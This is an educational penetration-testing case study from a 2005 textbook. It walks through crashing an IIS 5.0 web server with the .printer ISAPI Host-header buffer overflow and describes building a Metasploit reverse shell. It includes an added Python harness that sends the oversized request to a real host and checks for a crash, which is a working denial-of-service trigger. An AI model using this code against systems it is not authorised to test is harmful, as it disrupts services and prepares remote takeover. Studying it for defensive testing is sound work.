Case Study


The following case study illustrates the basic thought process of an attacker planning and executing a buffer overflow.

In this scenario, Evil Jimmy has stumbled across the new Windows 2000 IIS 5.0 web servers of Little Company Network (LCN). He is out to prove that LCN has just made a mistake with this deployment of IIS. A little research turns up a handy, potential buffer overflow in IIS 5.0 on a server that has not had the relevant service pack or hotfix applied. The vulnerability is in the Internet Printing ISAPI extension (the .printer extension, implemented by msw3prt.dll), was discovered by eEye Digital Security, and can give SYSTEM-level access to the server (see http://www.eeye.com/html/Research/Advisories/AD20010501.html; Microsoft's fix is MS01-023).

Step 1.

Jimmy goes to the LCN home page to confirm that the server is up and running. Using Internet Explorer, he connects to the server at http://192.168.200.21/printers. This page is his baseline for testing whether the server is online: after each attack he refreshes it to see whether he has crashed the service. Figure 14-4 displays the LCN printer web page.

Figure 14-4. Printer Web Page


Note

For more details on this IIS vulnerability, see "Windows 2000 IIS 5.0 Remote Buffer Overflow Vulnerability (Remote SYSTEM Level Access)" at http://www.eeye.com/html/Research/Advisories/AD20010501.html.

Step 2.

Evil Jimmy connects to the web server with NetCat and sends a request that is handled by the printer extension, packing a large amount of data into the Host: header. Jimmy knows that an oversized Host header on such a request is the trigger for this overflow (see Figure 14-5).

Figure 14-5. Using NetCat


Step 3.

Jimmy refreshes the browser to see whether the request succeeded in crashing the web server. Figure 14-6 shows that it did.

Figure 14-6. Web Server Not Responding


To double check, Jimmy refreshes again a moment later and notices that the server is back online. This indicates that the overflow took down only the IIS process and Windows 2000 restarted it automatically, so the service keeps running and the crash is easy for an administrator to miss.

Step 4.

Now that Jimmy knows the server is vulnerable, he would like a reverse shell from the web server back to his computer. Needing shellcode for this, he turns to the Metasploit website at http://www.metasploit.com/, which offers several ready-made payloads. Figure 14-7 shows the Windows Reverse Shell payload.

Figure 14-7. Metasploit Example Code


Step 5.

From here, it is straightforward for Jimmy to combine the shellcode with the overflow into an automated exploit that sends the malformed request to the web server and returns a reverse shell to his computer.
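The crash test of Steps 1 through 3, as an added example that is not part of the book or of the eEye advisory: a Python harness that checks the baseline page, sends a request for a .printer resource with an oversized Host: header, and then watches the baseline page to tell "no crash" from "crashed and restarted" from "stayed down". The request path /NULL.printer and the 420-byte padding follow the eEye proof of concept and are assumptions here, not figures from this page; FakeIISTarget is a constructed stand-in so the harness runs offline, and send_raw is the sender to use against a real lab host.

```python
"""Crash test for the IIS 5.0 .printer ISAPI overflow (added example, not book code).

Assumptions (not from the page): the request path /NULL.printer and the
420-byte Host: padding come from the eEye proof of concept; FakeIISTarget is a
constructed model of the target so the harness runs offline.
"""
import socket
import time


def build_baseline_request(target_host, path="/printers"):
    """Well-formed request for the page the case study uses as its 'is it up?' check."""
    return f"GET {path} HTTP/1.0\r\nHost: {target_host}\r\n\r\n".encode()


def build_printer_request(target_host, pad_len, path="/NULL.printer"):
    """Request routed to the printer ISAPI extension with an oversized Host: header.
    Everything except the Host value is well formed, so only the overflow differs."""
    return f"GET {path} HTTP/1.0\r\nHost: ".encode() + b"A" * pad_len + b"\r\n\r\n"


def send_raw(host, port, payload, timeout=5.0):
    """Real sender: open TCP, send payload, return the response bytes.
    Returns None on refused/reset connection or timeout, which is what the
    case study's browser shows as 'web server not responding'."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(payload)
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
            return b"".join(chunks)
    except (OSError, socket.timeout):
        return None


def is_online(response):
    """A response counts as 'online' only if it is an HTTP status line."""
    return response is not None and response.startswith(b"HTTP/")


def crash_test(sender, target_host, port=80, pad_len=420, rechecks=3, recheck_delay=0.0):
    """Steps 1-3 of the case study: baseline, overflow, re-check, wait for restart.
    sender(host, port, payload) -> bytes or None (send_raw or a fake)."""
    baseline = build_baseline_request(target_host)
    before = is_online(sender(target_host, port, baseline))
    if not before:
        return {"before": False, "verdict": "baseline offline; nothing to test"}
    sender(target_host, port, build_printer_request(target_host, pad_len))
    after = is_online(sender(target_host, port, baseline))
    recovered = False
    if not after:
        # Windows 2000 restarts the crashed IIS process; poll until it is back.
        for _ in range(rechecks):
            time.sleep(recheck_delay)
            if is_online(sender(target_host, port, baseline)):
                recovered = True
                break
    if after:
        verdict = "no crash observed"
    elif recovered:
        verdict = "crashed and auto-restarted: likely vulnerable"
    else:
        verdict = "crashed and stayed down"
    return {"before": before, "after": after, "recovered": recovered, "verdict": verdict}


class FakeIISTarget:
    """Constructed stand-in for the LCN server (assumption, for offline runs).
    Answers normal requests; 'crashes' (refuses connections) when a .printer
    request carries a Host: header longer than max_host; comes back after
    restart_after further connection attempts, like an auto-restarted IIS."""

    def __init__(self, max_host=256, restart_after=2):
        self.max_host = max_host
        self.restart_after = restart_after
        self.down_for = 0

    def __call__(self, host, port, payload):
        if self.down_for > 0:
            self.down_for -= 1
            return None  # connection refused while IIS is restarting
        request_line, _, rest = payload.partition(b"\r\n")
        headers = dict(line.split(b": ", 1) for line in rest.split(b"\r\n") if b": " in line)
        path = request_line.split(b" ")[1]
        if path.endswith(b".printer") and len(headers.get(b"Host", b"")) > self.max_host:
            self.down_for = self.restart_after
            return None  # overflow kills the IIS process; the connection drops
        return b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<html>printers</html>"


if __name__ == "__main__":
    # Offline run against the constructed target; pass send_raw instead for a real host.
    print(crash_test(FakeIISTarget(), "192.168.200.21"))
```

Against a live lab host, the same call with `send_raw` in place of `FakeIISTarget()` and a `recheck_delay` of a few seconds reproduces Jimmy's refresh-and-wait routine; the "crashed and auto-restarted" verdict is the symptom the case study treats as proof that the full exploit is worth building.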

This case study shows, at a high level, a basic buffer overflow test against a server. Many specific overflows are documented on the Internet, so you can study them and practice your programming skills. As a penetration tester, you can use buffer overflow testing to find out whether a server can be crashed, a tell-tale symptom that a larger attack, such as remote code execution, is possible.



Penetration Testing and Network Defense (Cisco Press, 2005), ISBN 1587052083
